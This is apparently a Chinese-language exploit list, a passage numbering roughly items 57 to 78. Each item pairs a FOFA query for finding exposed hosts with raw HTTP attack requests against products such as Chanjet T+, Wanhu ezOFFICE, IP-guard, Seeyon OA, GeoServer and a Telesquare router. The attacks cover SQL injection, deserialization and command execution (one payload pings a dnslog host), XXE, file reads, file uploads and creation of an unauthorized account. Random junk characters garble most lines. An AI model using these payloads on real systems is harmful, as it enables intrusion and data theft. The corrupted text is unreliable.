5 C$ L: M' ~: _ I8 E1 y! TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36+ E6 F! P+ [- v
Content-Type: application/json
& U" G# \! v: W! P& S% y' d# f3 x& s4 @
{/ a! R/ f$ E$ z1 ^8 W3 p# r
"storeID":{. E5 ?! D# B; J" _" y( I
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 B" Y/ \% U2 v& `/ F
"MethodName":"Start",
& i o s# V: n& E7 P6 o) u "ObjectInstance":{
8 j2 z" x; G4 ~- J5 ], g "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",; ~# E C/ d- i9 k& g( n5 d O: K
"StartInfo": {
3 | {& z* N7 |8 }) c "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", y- e, v7 b( z( t2 {+ A# k; Q/ H
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
: f/ w" U9 u0 e/ ~ d0 L }) F4 G! k$ L1 O, Q( t' d
}" R7 f) r+ u4 ?7 q, {" o! ^9 d8 s
}
/ U; p+ t# y6 v. K; p}
K2 {/ |9 c* K1 o: _7 H& s {# X$ d$ ~ o% f2 B
3 S' G* O+ d; B0 @) i ~' S57. 畅捷通T+ keyEdit.aspx SQL注入- A! z8 l7 E9 W: y8 D: N
FOFA:app="畅捷通-TPlus"
2 K4 Z" N* G# E) \GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.11 W0 [ W( H# V9 M9 h; g
Host: host
3 e; P, ~4 s7 r6 ^3 Y" i. y0 b+ b+ I7 DUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& {: O" E; ?) M
Accept-Charset: utf-8
# _4 j1 t: l- [% k. V8 MAccept-Encoding: gzip, deflate
: }; e/ }, V& L6 T, gConnection: close
+ Z, e' `2 @6 D% d7 h4 m
: E5 K6 ]4 X. |/ w U
' p% k; M: m& T8 V- F1 H# U4 f58. 畅捷通T+ KeyInfoList.aspx sql注入3 h1 v+ J4 A& A. B) U
FOFA:app="畅捷通-TPlus"
2 M( ]3 [9 {) w5 YGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
+ [& F% u) w ^- q1 j3 {! aHost: your-ip
$ t4 c' i. \2 K5 P- BUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
0 z1 J6 E' J* } G& e' tAccept-Charset: utf-83 w8 Y# Q" c" {) b6 A0 f" i
Accept-Encoding: gzip, deflate
9 U$ D" i& O C* K; d9 q; iConnection: close
5 M# Z" e/ z4 _$ R' N/ P8 x5 k+ n. S, d& I' q
$ T- L8 e6 G/ o6 U, c
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行% b! \/ a7 r9 \
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd" j: }; ]) M" e; V$ R
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
" M6 {* G2 L. g' O+ bHost: 192.168.86.128:90908 B8 d& q5 F# J, K' ]4 A3 ~
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
1 K" {2 b# d @# P9 JConnection: close$ G& O: K4 H: f" f1 f+ b
Content-Length: 1669( E8 X4 ~$ q* k. E
Accept: */** i2 L; L6 s( j' {
Accept-Language: en6 S O" S2 L- u
Content-Type: application/x-www-form-urlencoded
6 [" S( j: u# \- C3 E. {Accept-Encoding: gzip
. }: v/ i& z4 z( y3 W" A+ b+ W
: s# z$ W& _8 H* o0 H& {PAYLOAD0 v. F; l1 M3 ^2 D/ ~3 R4 a# f2 o
6 o$ b7 D- R& |# ^) F
- ^- O6 q& F) W60. 百卓Smart管理平台 importexport.php SQL注入
5 m# _6 }# _8 D; E' KFOFA:title="Smart管理平台"
6 F. f9 a# \$ o3 f* s6 {) E IGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
& J4 _% l" K0 P$ O: |9 uHost:
' P' ]5 u& Z7 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% P. h* I5 U* hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- K7 [ k. E+ n8 n: ^+ J5 Z3 r5 Y+ gAccept-Encoding: gzip, deflate" j) X; N/ x& ^4 L
Accept-Language: zh-CN,zh;q=0.9
, J! I9 e8 K( J, e- R* E% pConnection: close9 _0 N% X8 B9 a( L& p
+ s8 |1 X! g5 Z% J+ p/ g6 R
8 n' a2 ~3 c- @& \7 H5 E
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
, p3 c7 P7 ?9 G! yFOFA: title="欢迎使用浙大恩特客户资源管理系统"* o1 ?4 ~# h1 `$ K9 I$ I
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1/ `, h# P8 H: @) ?0 r& I
Host: x.x.x.x, z$ \; T/ p( r# f& f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* |; v; W- Q8 @; e( f
Connection: close
) _$ e( `3 G/ u/ h3 y' {; V% rContent-Length: 27( t+ g. S$ f! t. l
Accept: */*
3 E; ~2 L; V8 u* X1 m' {Accept-Encoding: gzip, deflate/ w( L! |1 {, `4 C; c% I
Accept-Language: en% G, f" \" [4 D5 {3 K) q
Content-Type: application/x-www-form-urlencoded
z' P4 i* L; M* Q/ f0 q% X N6 f& {* X8 h; z
8uxssX66eqrqtKObcVa0kid98xa7 L5 g9 K {! P8 }* L
h( ^3 _9 L5 `& J
3 @% f1 n4 ?4 [3 v! b* b8 d62. IP-guard WebServer 远程命令执行
; A z% h# D; C" t) K* CFOFA:"IP-guard" && icon_hash="2030860561"
& i* I' o" W: M, u3 kGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1# R! b j1 b1 D% e0 [
Host: x.x.x.x
; \; ]8 V! a9 t, ?- |5 oUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36- w9 d, a& x* `, h% X1 S
Connection: close
5 _* a5 q6 Q( dAccept: */*; H$ t9 \( M- z r2 j4 R
Accept-Language: en
/ U, A/ `. |" M1 z1 x4 w! b$ EAccept-Encoding: gzip3 Z6 O- Z! s# }
, A8 H, ?2 |. W# \5 b4 f
- W+ ]% ?8 K3 q; z* I, V+ K
访问1 Y! q4 A L7 @- L* x2 B6 i) U
, b# X# v) |$ E
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.12 l) P: ?8 z9 ]
Host: x.x.x.x2 f4 C4 x7 b$ J% V4 B# R2 e/ B+ Q
: W% u" b1 x1 U6 [7 \7 D- x! c7 O3 [& n# [' C( s/ G( T, F4 d, H
63. IP-guard WebServer任意文件读取
0 t. p3 m6 X' I: LIP-guard < 4.82.0609.0
2 l+ ~3 \. h! k% v7 y( ~( @! J7 W3 iFOFA:icon_hash="2030860561"
+ D! r J4 [6 b, S7 {POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.13 f6 w7 ?/ p. f5 V* u6 y7 \
Host: your-ip. X! V2 k4 ^$ t+ N0 B* J% L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 \! ~0 @8 a3 @5 d4 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' J$ F! a7 j: Q% mAccept-Encoding: gzip, deflate
9 J, ^' c0 Y( r+ ~1 Z7 K% q# o1 GAccept-Language: zh-CN,zh;q=0.9
0 {1 e7 t- H- N3 Z8 U5 P1 w% IConnection: close
( U. \, Y3 Y7 q- b! CContent-Type: application/x-www-form-urlencoded8 k$ U- M1 [+ d: z E: o
0 [0 ^0 d2 _! s4 n
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
3 N3 P. w T' h
- u3 c' {0 F) s6 W- S64. 捷诚管理信息系统CWSFinanceCommon SQL注入 Z+ a- u8 }( v! M4 ?
FOFA:body="/Scripts/EnjoyMsg.js"
2 x Q0 T6 y3 p7 g" }& `. \5 d- JPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1! O" H6 N- @0 G6 }# O
Host: 192.168.86.128:90017 y# i$ u/ I3 R+ P1 G/ u
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.367 h# ^1 i' @' [* T# p4 p: g
Connection: close7 y4 u& q# T. F' i: g4 ?9 s
Content-Length: 369
. r l# t2 I- }1 A& y$ {0 bAccept: */*
1 M3 ~$ J% w/ ^' |. g2 a! T2 TAccept-Language: en7 f6 x) p/ s% K! X/ G
Content-Type: text/xml; charset=utf-8' d4 a8 Q" K+ [, @+ E. ^5 }
Accept-Encoding: gzip
/ H; G- P) ~' Q* `6 S" p4 Z7 @
6 n( k3 ~( ]! t8 Q* N6 z<?xml version="1.0" encoding="utf-8"?>3 Y/ A9 o" p9 R, X; u# r
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
8 V! F( x' n6 d5 m2 [<soap:Body>2 r% q6 S) A2 F/ W1 Q/ u
<GetOSpById xmlns="http://tempuri.org/">3 W N# y! B+ W9 r1 o6 s% a
<sId>1';waitfor delay '0:0:5'--+</sId>: C7 w7 u" {+ j, X* m
</GetOSpById>! c7 {& D9 V- ~
</soap:Body>0 A- w6 ?+ t0 `& z `* \0 b9 F
</soap:Envelope>5 K$ O( M2 b9 \" a0 H/ Y
3 H2 l+ \$ A- L+ P* {4 c& p, j# [
& n4 w0 M$ O* M) N! p65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过6 x0 D/ C- C- ~1 [
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"( r( z1 K( d, h, F$ { M4 h2 B% i
响应200即成功创建账号test123456/123456
: j _; [* S/ i& cPOST /SystemMng.ashx HTTP/1.1) Z$ w3 r. R. D) H
Host:
M; s8 c2 B9 V4 a* M; kUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
: Z! e6 d# {* x# B% M2 ?& QAccept-Encoding: gzip, deflate
( C5 p6 q A* s8 HAccept: */*
r. k# a, L( u; z, O6 E1 W1 QConnection: close' b, y, J: \+ c5 V/ [, u
Accept-Language: en
8 Z* T I: D ]Content-Length: 174
) B4 B* }' z8 b6 \# }6 E
2 N8 X8 h5 z" @! C* m, T: ?& E: ?operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators% g: {! m8 |, W4 F* U8 y
1 j" r, Z5 \) f3 O n- u/ w- O* S& U9 u
3 K- N5 e# i6 x6 f" p66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
- K- i9 C" I* l4 P$ ?* x# n0 RFOFA:app="万户ezOFFICE协同管理平台"
7 { _# X4 b$ P9 T5 U A. s
z9 |/ S3 Z$ Y8 S {5 D$ ]# u9 n8 GGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
% v% k: g. o+ d' t" }3 ?, N. v( LHost: x.x.x.x+ z$ F' H Q$ M+ v, s0 g2 ?+ C& p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 y. h! V4 ?, w( Q, q! H( s2 a
Connection: close
) |- m L- Y+ s: ?" Y5 d1 R0 mAccept: */*; M( v4 `3 {2 {; I2 c" j1 Q$ u- Z
Accept-Language: en9 h$ q ~, @4 G) Z6 r) |
Accept-Encoding: gzip
( S# s# _- U* M7 c- D; N. v- {; Q: \, Y# u$ p; `$ h
7 f& w( e: Y" v- q" W# \* j
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
6 @1 y3 J( [9 O
/ r" h0 v5 j. r3 z ?$ O3 q( z67. 万户ezOFFICE wpsservlet任意文件上传' J$ F) `1 g1 l3 i5 q4 {
FOFA:app="万户网络-ezOFFICE"- k2 G7 }! U m# k4 m' T
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
$ {8 f' p, X# Z8 n W0 K' ?8 UPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
$ P9 o5 G/ I+ t) H \0 bHost: x.x.x.x
$ z0 w+ p. [8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
% p) ]5 `! y1 |Content-Length: 173( ?9 T3 |4 ]4 m" q% v0 S& a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7 D$ F' E5 d: g$ y$ |- W+ q2 X( XAccept-Encoding: gzip, deflate
& W2 v2 p" Q9 ?# k* O3 g. {* N9 PAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
L7 p8 ~, a, C7 [% O& jConnection: close5 a, ~% ^2 e2 o
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
6 z% [# M# F% a' @/ S! z A& L4 _DNT: 1
2 o+ f# a% T- B+ eUpgrade-Insecure-Requests: 1
# |; }2 A: [; D7 F9 ^/ e+ l! y% j5 Y! k
--ufuadpxathqvxfqnuyuqaozvseiueerp
4 O+ B8 p6 l7 Q. |Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
8 w, ^' a, J6 m! ?1 G ] r" h$ L& {$ P& G9 P
<% out.print("sasdfghjkj");%>
0 g) N, q, c7 `5 @5 |; y--ufuadpxathqvxfqnuyuqaozvseiueerp--
0 A) A: G/ ~! h1 l2 u: X7 R' j8 W/ l
+ m" L2 U1 D, u4 T: j0 c+ A! B& \, a文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
8 K; K0 s6 h/ Q5 ^+ t8 j+ F3 K% B4 a& I
68. 万户ezOFFICE wf_printnum.jsp SQL注入
# W, J4 ]5 C5 O O/ N2 FFOFA:app="万户ezOFFICE协同管理平台"/ n% \! ?/ o [# U
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
/ G2 {1 c8 ]6 u* vHost: {{host}}
9 K3 X( H+ x/ Y" Q7 X0 O/ F# rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
U( C W0 _' r* LAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% `. [; N- G8 P5 D j5 ^8 b8 s
Accept-Encoding: gzip, deflate
8 ^. H" k. L* s9 XAccept-Language: zh-CN,zh;q=0.9: @, k% \; Z! ~, {
Connection: close, z) n; v; m0 U% {0 D3 x
. e3 C( K/ ?$ v5 W$ w0 S
$ O" w# q, V9 q5 N69. 万户 ezOFFICE contract_gd.jsp SQL注入
* h+ u: ^# W$ v7 ^2 AFOFA:app="万户ezOFFICE协同管理平台"- P" c2 c1 E v% R/ f4 p3 {
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
2 O* U. M0 \# y4 H+ iHost: your-ip
4 L, a$ V8 O6 O VUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ f) v+ t: r$ g; e6 QAccept-Encoding: gzip, deflate- F, s W6 y: e* I
Accept: */*
* E0 _9 Q- }* m/ m* r/ ~Connection: keep-alive8 {( R: g* Q( Y1 D& I
/ Q. A0 w# y4 ?, M% ~. ], Q# l
- h% [8 x' ]8 \- y5 ^: C70. 万户ezEIP success 命令执行9 @# r' z% V; `+ p9 c, N
FOFA:app="万户网络-ezEIP"
9 u+ p5 V, y0 k/ jPOST /member/success.aspx HTTP/1.1
9 V1 o m0 K2 m. l* OHost: {{Hostname}}
' o1 @/ n2 q- dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36# H9 A2 ^9 r! a
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=$ \4 O' |! B9 K* _
Content-Type: application/x-www-form-urlencoded4 z2 n- ?7 w* v- H
TYPE: C
% a* x5 b6 x( V5 lContent-Length: 16702
2 V* L7 S# t; [# N$ u6 _. W' I9 J- [3 ]! H. F3 Q6 L3 y; u
__VIEWSTATE=PAYLOAD
3 i) Q1 K% q2 d+ }6 e, {% ^% V/ ^9 V
7 b6 I2 @* d' n9 j, [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入1 T& _" \# H/ ~" a1 k
FOFA:body="PM2项目管理系统BS版增强工具.zip"' r4 i. E6 I& t- |
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
1 K8 H/ q- L! {' p+ cHost: x.x.x.xx.x.x.x" }: j8 o1 S1 d5 N
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 i/ r. v* {. M
Connection: close
; ^. w$ O+ O6 M. f n' NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 g! J% Z C r7 N2 q/ f* j
Accept-Encoding: gzip, deflate6 K% V5 B: G5 k$ S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 [2 ]) ?1 x# `/ O# D& _8 m; TUpgrade-Insecure-Requests: 17 q( e) U! Z3 o" a
# {; Z, d0 Q: `0 Q" ^& S# d
3 F* t, P0 o5 Q/ W0 X. c4 e; L3 s72. 致远OA getAjaxDataServlet XXE9 r% D/ q: ~9 f; M! C3 D
FOFA:app="致远互联-OA"
1 K5 d$ z+ j4 r& Q, SPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
: K7 V6 w9 A4 \8 _$ y7 PHost: 192.168.40.131:8099
: \' ^+ B: D9 p" }User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36% E7 {) I) C+ \7 ]* L
Connection: close" N& B+ P: c5 [/ g
Content-Length: 583" E; p) n8 B$ D# T6 o I+ h
Content-Type: application/x-www-form-urlencoded
: e7 Y0 G1 H3 u7 ^" a* K3 Y8 IAccept-Encoding: gzip
* ^- L/ S u, X& Y
7 l) ?; ~/ L# d6 TS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E# g! k8 ]$ n8 x s
1 q* Y( }, u6 y: C$ `7 \, V6 k8 A4 E; g1 d, o1 y
73. GeoServer wms远程代码执行 ]9 c/ m4 L6 _/ }7 M7 }
FOFA:icon_hash=”97540678”% ~3 u6 A: x7 u7 Y# w9 P9 Y
POST /geoserver/wms HTTP/1.12 w3 A6 r4 C! D8 P, f2 ?$ v \+ \
Host:
+ C. J5 U2 n' S+ N2 G; S# PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
D& J% u$ S7 q! q; G/ {Content-Length: 19811 N: F! [# c4 a0 Q4 C
Accept-Encoding: gzip, deflate. v' t% a- N. z
Connection: close/ u( N3 d( z$ E: r$ N8 y' w
Content-Type: application/xml6 k% u- N9 @. t9 ~ y3 r+ E+ c& n
SL-CE-SUID: 3
% J1 ]6 b2 ]) C3 O+ t- f" z! u( a" M+ r U0 `' n
PAYLOAD
Y0 @" l1 `/ N% V, e
3 @+ ] U% b' n5 o# `
$ _7 t5 D6 g& l, l2 G; U74. 致远M3-server 6_1sp1 反序列化RCE
* x& w& Z' ] {* q3 A& D7 }FOFA:title="M3-Server"0 l* |# p2 j: A" Q% h! t2 L0 @$ f$ E
PAYLOAD
9 R$ r5 r0 X4 v) ?, ~( ?1 r" u! _* s
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE2 M& X' F, T8 f* l. d
FOFA:app="TELESQUARE-TLR-2005KSH"; {4 a- h/ T2 x0 M/ F5 Z
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
: ?: z1 @) j. [Host: x.x.x.x
) }. |2 k' c: I S1 G7 W: eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 B2 \8 k; a. @1 H1 H% ?
Connection: close
* |4 K4 P+ w& Y, f4 F& O$ yAccept: */*, o4 L: Z1 U) a& v) j( z" i
Accept-Language: en
* c0 ~! E/ g% `7 iAccept-Encoding: gzip, \2 T4 f: { m. S- g% `4 U" V" L! F" V
% X% _9 Q! A! e' @8 y2 ~% Q0 @! V
p6 o+ v" t a8 `
GET /cgi-bin/test28256.txt HTTP/1.14 d6 p" G% b7 K3 a( m+ f: G
Host: x.x.x.x2 q7 {- {; N# f3 l4 g" R
6 d9 H. M3 ^5 z, [; H* G& y, d! S' Q1 @/ d* C" D( r
76. 新开普掌上校园服务管理平台service.action远程命令执行) g7 @+ ~3 e* i6 Z
FOFA:title="掌上校园服务管理平台"
- I* H9 |% b1 l8 W- l" yPOST /service_transport/service.action HTTP/1.1' v5 i9 z& k% U- e
Host: x.x.x.x( u& N0 a% o0 Q2 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
- w6 d0 S$ b A; e* s# aConnection: close
6 \% ~/ a/ m& \Content-Length: 211( }- B9 p5 q+ l# X P; \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% k1 W$ Z4 w2 G" A" M' G" l3 G8 QAccept-Encoding: gzip, deflate
; @9 W" w8 v0 q; U H: r1 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 l# d. ]8 v) vCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
0 {" G7 C- r5 F9 |) z& |# ^1 VUpgrade-Insecure-Requests: 1
$ J1 L/ M$ Z" G( R1 t4 D
% M8 T+ f' I+ k3 D+ l{6 _% z7 L1 a4 W2 e3 x. q8 X/ H
"command": "GetFZinfo",) m& t. w! A6 B3 b0 X- X, o5 @
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 ~ W4 o4 Q7 N+ Z ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"- p; a* z0 i' L4 p* l4 Z
}
c9 ^, u; `/ w7 W" N5 q
' A/ S+ L }1 \* v( f/ j% p7 @- w. T J- i! p H3 l
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
% a+ d* }3 L4 yHost: x.x.x.x* m0 j8 ^" \8 x9 M3 E
3 a/ J+ H" {5 P! B0 ~
o; |) ~, B( T* ^. j
5 y; h& I1 f# m) ~77. F22服装管理软件系统UploadHandler.ashx任意文件上传
& Z$ y( D7 ^( u6 z0 k' pFOFA:body="F22WEB登陆"
, K z; n1 n5 n& B1 Q/ APOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
8 E3 m! |: k. ^3 {- XHost: x.x.x.x: Q4 ^! l: W5 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 Q. U0 B, f& ~: J, x' _9 m4 n
Connection: close
% b; ?+ ?$ u+ J5 [6 W% Y0 \Content-Length: 433+ F) [: M% } ^+ c+ ]" ?
Accept: */*0 S7 \" f1 I. y7 s, [5 V
Accept-Encoding: gzip, deflate
# H3 ^+ z3 h `" ZAccept-Language: zh-CN,zh;q=0.9
( X+ p. {% i4 z( K) j, cContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
* J% D4 A1 q* u5 i! u0 f0 H8 f6 e9 K* J4 f: W
------------398jnjVTTlDVXHlE7yYnfwBoix4 R2 M( a" F! K
Content-Disposition: form-data; name="folder" B( Y7 }+ y) i2 N, N# S T
0 c& w( J+ `. ~" K/upload/udplog6 s9 E1 E% J" _) |6 j) W
------------398jnjVTTlDVXHlE7yYnfwBoix
# V% r6 `( V7 {: N. jContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
. ^; j% m' E7 A i2 g0 kContent-Type: application/octet-stream; ]0 ~7 O# G5 I
; L2 [- L' S- C& |% e, {hello1234567
* D# f9 G9 E# K) q" [% f8 b------------398jnjVTTlDVXHlE7yYnfwBoix+ g8 N) q: k( a$ h
Content-Disposition: form-data; name="Upload"( `2 g; i6 p$ ^9 X% S
. [7 A4 D, r$ r2 \Submit Query
* z5 x T, e& Y: z# o) |------------398jnjVTTlDVXHlE7yYnfwBoix--! r' T2 v0 f0 \! t2 F$ C: e+ }
+ C; l- C0 J2 B: G, U6 B
) I; |. x! e% Y' n8 O78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传, M3 B3 U; g7 M: v( H& C
FOFA:icon_hash="2001627082"
+ q* g* J, j8 o6 vPOST /Platform/System/FileUpload.ashx HTTP/1.1# c1 `+ m+ w, ]; P, d& T7 b
Host: x.x.x.x. z1 {' x2 Z, P$ m* u/ F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Q5 t6 T C- V+ QConnection: close
* P4 z" [5 A( n$ r. s) A0 ^' ^3 s$ MContent-Length: 336
7 _; o6 K/ C' s g5 z9 OAccept-Encoding: gzip
* N! H+ N. o/ ^* i! e. _5 MContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
T; `5 p/ ~1 X
+ N9 t" F+ U, B. {# M------YsOxWxSvj1KyZow1PTsh98fdu6l
1 `4 b/ o+ C: r; C6 XContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"' B5 k0 `$ n8 t) i P
Content-Type: image/png$ r4 O5 m+ \6 Z! w' ?' ~" K
9 E5 T( W$ a- B" z$ v$ oYsOxWxSvj1KyZow1PTsh98fdu6l
5 O2 Y+ J' R! p# c6 d, [; M7 v------YsOxWxSvj1KyZow1PTsh98fdu6l6 v5 n7 z( L$ a" {( ]
Content-Disposition: form-data; name="target"! a5 i O" U, i( G
4 c4 f8 N: e7 I) V) Q4 J/ P
